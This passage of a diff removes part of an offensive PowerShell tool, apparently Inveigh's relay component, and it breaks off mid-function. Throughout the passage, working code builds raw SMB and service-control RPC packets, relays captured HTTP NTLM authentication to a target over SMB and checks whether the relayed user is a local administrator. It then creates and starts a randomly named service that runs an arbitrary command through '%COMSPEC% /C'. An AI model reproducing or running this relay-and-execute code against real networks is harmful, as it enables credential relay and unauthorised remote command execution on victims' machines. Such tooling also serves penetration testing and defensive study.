- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName",$packet_command)
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize",[Byte[]](0x00,0x00,0x00,0x00))
-
- return $packet_SCMCreateServiceW
- }
-
- function Get-PacketSCMStartServiceW()
- {
- param([Byte[]]$packet_context_handle)
-
- $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle",$packet_context_handle)
- $packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
-
- return $packet_SCMStartServiceW
- }
-
- function Get-PacketSCMDeleteServiceW()
- {
- param([Byte[]]$packet_context_handle)
-
- $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle",$packet_context_handle)
-
- return $packet_SCMDeleteServiceW
- }
-
- function Get-PacketSCMCloseServiceHandle()
- {
- param([Byte[]]$packet_context_handle)
-
- $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle",$packet_context_handle)
-
- return $packet_SCM_CloseServiceW
- }
-
-}
-
-# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge
-$SMB_NTLM_functions_scriptblock =
-{
- function SMBNTLMChallenge
- {
- param ([Byte[]]$payload_bytes)
-
- $payload = [System.BitConverter]::ToString($payload_bytes)
- $payload = $payload -replace "-",""
- $NTLM_index = $payload.IndexOf("4E544C4D53535000")
-
- if($payload.SubString(($NTLM_index + 16),8) -eq "02000000")
- {
- $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
- }
-
- return $NTLM_challenge
- }
-
-}
-
-# SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target
-$SMB_relay_challenge_scriptblock =
-{
- function SMBRelayChallenge
- {
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version)
-
- if($SMB_relay_socket)
- {
- $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
- }
-
- $SMB_client_receive = New-Object System.Byte[] 1024
- $SMB_client_stage = 'NegotiateSMB'
-
- :SMB_relay_challenge_loop while($SMB_client_stage -ne 'exit')
- {
-
- switch ($SMB_client_stage)
- {
-
- 'NegotiateSMB'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
- $packet_SMB_data = Get-PacketSMBNegotiateProtocolRequest $SMB_version
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
- $SMB_relay_challenge_stream.Flush()
- $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
-
- if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42')
- {
- $SMB_version = 'SMB1'
- $SMB_client_stage = 'NTLMSSPNegotiate'
- }
- else
- {
- $SMB_client_stage = 'NegotiateSMB2'
- }
-
- if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03'))
- {
- $inveigh.console_queue.Add("SMB relay disabled due to SMB signing requirement on $Target")
- $SMB_relay_socket.Close()
- $SMB_client_receive = $null
- $inveigh.SMB_relay = $false
- $SMB_client_stage = 'exit'
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay disabled due to SMB signing requirement on $Target")
- }
-
- }
-
- }
-
- 'NegotiateSMB2'
- {
- $SMB2_tree_ID = 0x00,0x00,0x00,0x00
- $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $SMB2_message_ID = 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_data = Get-PacketSMB2NegotiateProtocolRequest
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
- $SMB_relay_challenge_stream.Flush()
- $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
- $SMB_client_stage = 'NTLMSSPNegotiate'
- }
-
- 'NTLMSSPNegotiate'
- {
-
- if($SMB_version -eq 'SMB1')
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes 0x00,0x00
- $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
- $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- }
- else
- {
- $SMB2_message_ID += 1
- $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate 0x07,0x82,0x08,0xa2 $HTTP_request_bytes[($HTTP_request_bytes.Length-8)..($HTTP_request_bytes.Length)]
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
- $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_negotiate
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- }
-
- $SMB_relay_challenge_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
- $SMB_relay_challenge_stream.Flush()
- $SMB_relay_challenge_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
- $SMB_client_stage = 'exit'
- }
-
- }
-
- }
-
- return $SMB_client_receive
- }
-
-}
-
-# SMB Relay Response ScriptBlock - sends NTLM reponse to relay target
-$SMB_relay_response_scriptblock =
-{
- function SMBRelayResponse
- {
- param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_version,$SMB_user_ID,$SMB_session_ID)
-
- $SMB_client_receive = New-Object System.Byte[] 1024
-
- if($SMB_relay_socket)
- {
- $SMB_relay_response_stream = $SMB_relay_socket.GetStream()
- }
-
- if($SMB_version -eq 'SMB1')
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SMB_header["SMBHeader_UserID"] = $SMB_user_ID
- $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $HTTP_request_bytes
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
- $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_auth
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- }
- else
- {
- $SMB2_message_ID = 3
- $SMB2_tree_ID = 0x00,0x00,0x00,0x00
- $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $HTTP_request_bytes
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
- $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_auth
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- }
-
- $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_relay_response_stream.Flush()
- $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00'))
- {
- $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- }
-
- }
- else
- {
- $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target")
- $SMB_relay_failed = $true
- $SMB_relay_socket.Close()
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- }
-
- }
-
- if(!$SMB_relay_failed)
- {
-
- if(!$Service)
- {
- $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
- $SMB_service = $SMB_service_random -replace "-00",""
- $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
- $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
- $SMB_service_random += '00-00-00-00-00'
- $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- }
- else
- {
- $SMB_service = $Service
- $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($Service)
-
- if([Bool]($SMB_service.Length % 2))
- {
- $SMB_service_bytes += 0x00,0x00
- }
- else
- {
- $SMB_service_bytes += 0x00,0x00,0x00,0x00
-
- }
-
- }
-
- $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.Length + 1)
- $Command = "%COMSPEC% /C `"" + $Command + "`""
- [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$PsExec_command += "{0:X2}-00-" -f $_}
-
- if([Bool]($Command.Length % 2))
- {
- $PsExec_command += '00-00'
- }
- else
- {
- $PsExec_command += '00-00-00-00'
- }
-
- $PsExec_command_bytes = $PsExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $PsExec_command_length_bytes = [System.BitConverter]::GetBytes($PsExec_command_bytes.Length / 2)
-
- $SMB_path = "\\" + $Target + "\IPC$"
-
- if($SMB_version -eq 'SMB1')
- {
- $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00
- }
- else
- {
- $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
- }
-
- $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03
- $SMB_client_stream = $SMB_relay_socket.GetStream()
- $SMB_split_index = 4256
-
- if($SMB_version -eq 'SMB1')
- {
- $SMB_client_stage = 'TreeConnectAndXRequest'
-
- :SMB_execute_loop while ($SMB_client_stage -ne 'Exit')
- {
-
- switch ($SMB_client_stage)
- {
-
- 'TreeConnectAndXRequest'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'CreateAndXRequest'
- }
-
- 'CreateAndXRequest'
- {
- $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
- $SMB_tree_ID = $SMB_client_receive[28,29]
- $packet_SMB_header = Get-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'RPCBind'
- }
-
- 'RPCBind'
- {
- $SMB_FID = $SMB_client_receive[42,43]
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'OpenSCManagerW'
- }
-
- 'ReadAndXRequest'
- {
- Start-Sleep -m 150
- $packet_SMB_header = Get-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBReadAndXRequest
- $packet_SMB_data["SMBReadAndXRequest_FID"] = $SMB_FID
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = $SMB_client_stage_next
- }
-
- 'OpenSCManagerW'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'CheckAccess'
- }
-
- 'CheckAccess'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- $SMB_service_manager_context_handle = $SMB_client_receive[88..107]
- $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- }
-
- if($SCM_data.Length -lt $SMB_split_index)
- {
- $SMB_client_stage = 'CreateServiceW'
- }
- else
- {
- $SMB_client_stage = 'CreateServiceW_First'
- }
-
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- $SMB_relay_failed = $true
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- }
-
- }
- else
- {
- $SMB_relay_failed = $true
- }
-
- }
-
- 'CreateServiceW'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'StartServiceW'
- }
-
- 'CreateServiceW_First'
- {
- $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
- $packet_RPC_data = Get-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
- $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
- $SMB_split_index_tracker = $SMB_split_index
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if($SMB_split_stage_final -le 2)
- {
- $SMB_client_stage = 'CreateServiceW_Last'
- }
- else
- {
- $SMB_split_stage = 2
- $SMB_client_stage = 'CreateServiceW_Middle'
- }
-
- }
-
- 'CreateServiceW_Middle'
- {
- $SMB_split_stage++
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
- $SMB_split_index_tracker += $SMB_split_index
- $packet_RPC_data = Get-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
- $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if($SMB_split_stage -ge $SMB_split_stage_final)
- {
- $SMB_client_stage = 'CreateServiceW_Last'
- }
- else
- {
- $SMB_client_stage = 'CreateServiceW_Middle'
- }
-
- }
-
- 'CreateServiceW_Last'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
- $packet_RPC_data = Get-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'StartServiceW'
- }
-
- 'StartServiceW'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00')
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
- $inveigh.log_file_queue.Add("Trying to execute SMB relay command on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
- $inveigh.log.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
- }
-
- $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target")
- $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target")
- $SMB_service_context_handle = $SMB_client_receive[92..111]
